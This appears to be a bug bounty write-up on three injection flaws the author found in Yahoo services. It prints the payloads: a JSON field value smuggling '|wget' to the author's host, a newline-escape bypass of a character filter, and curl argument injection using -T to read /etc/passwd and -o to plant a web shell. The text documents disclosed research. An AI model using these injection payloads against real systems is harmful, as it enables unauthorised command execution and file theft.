How I found 2.9 RCE at Yahoo! Bug Bounty program

Hi. I’m kedrisec and I want to describe 3 vulnerabilities that I found as part of the security research at Yahoo Bug Bounty program. So, lets begin.

Foreword

The Yahoo’s Bug Bounty program include a lot of services and I decided to work around Brightroll.

First RCE

I started with the regular thing when you do bug hunting, it’s reconnaissance. I do nothing irregular: Google, Aquatone etc…

So, when Aquatone show me some interesting port I decided to work around it. That’s what I saw:

Queue list

Looks like something insteresting, doesn’t it? Ok, It’s time to explore the functional of this thing. As I understood this panel used for creating some tasks(messages) like a RabbitMQ. So, when I clicked on one of the queues I saw the next picture:

Message lists

This is a lists of messages of the queue. I decide to click on “New Message” link and I saw form (It seemed strange for me because I had no idea what is that):

Strage form

When I tried to create a new message I was filling this fields randomly. After that I clicked to the submit button and I was redirected to the page of my freshly created message. I saw the window that looks like terminal but I couldn’t write to it anything. This window show me an error (I’m sorry but I haven’t screenshot of this).

I come back to message lists and choose one of them. I noticed that it show me filled “Strage” form. It was string in JSON format and looks like this:

json:{“sub_bound”:true,”hostname”:”REDACTED",”timestamp”:”2017/07/01/1649",”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED","type":"REDACTED","interval_id":"REDACTED","pod_id":"22"}

I tried to create a new message with this value of parameter 1 field. And after redirect to created message I noticed that several of json values put in to string that was similar to bash command.

Window like terminal

So, I just try to write “|wget mywebsite.com” aaaaaand it was working ^^. I’ve simplified the hacking process, actualy it was taking about 2 days of work.

Final payload was:

json:{“sub_bound”:true,”hostname”:”REDACTED",”timestamp”:”2017/07/01/1649",”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED","type":"REDACTED","interval_id":"REDACTED","pod_id":"22|wget http://myhost.name"}
Brightroll RCE

Second RCE

Actually, it was the RCE via the same service that was in previous RCE.

After about 3 months I found the different host with the same service on the same port. But at this time my previous payload didn’t work. If I remember correctly the reason of it was that symbols | & ; ` { } were filtred. I could bypass it after 1 day working around it. The bypass looks like something that:

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/10/23/2248",”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”23\u000awget\u0020http://myhost.name"}

Third ALMOST RCE

This vulnerability is the most interesting of all my finds. So, I started my research of yahoosmallbusiness store after creating a few products to have access to functions related with it. While I was discovering a functional I noticed that when I visit email templates page ajax send a few requests to get path to the images of products that showed on the page. One of the requests was sended to objinfo_data.php with parameter id. As I thounght this script was used to resize products image. So, this part is important. When I was creating a products I notice that request that used to create product containt a couple of urls to image but not directly binary image data. My suggestion was that: “What if the script get the link of product image and use it to resize.”. I thought it’s may be SSRF. I edited the product, changed image url to my host and port and runned netcat. After that I use product id of this product in request to objinfo_data.php. Netcat showed me the request and I noticed that User-Agent was Curl. After that I tried to get RCE any possible ways, but have no results:( It just wasn’t working. After all my torment’s I decide to ask my collegues about it. One of them offered to try to use “-A something” and if I will see “User-Agent: something” in the request in netcat it’s possble to injection to argument string. I tried and it worked! After that another my collegue immediately offer to me use flag -T. This flag get file from file system and attach it to request. I used it and was able to read /etc/passwd.

Why I called it almost RCE when I cant execute another commands? Because curl have another interesting flag “-o” this flag can be used to write output to file system. Therefore, If I could found web directory on the server, I just was able to write web-shell there and (if it was over firewall) execute it via curl :)

Yahoo Small Business curl argument injection.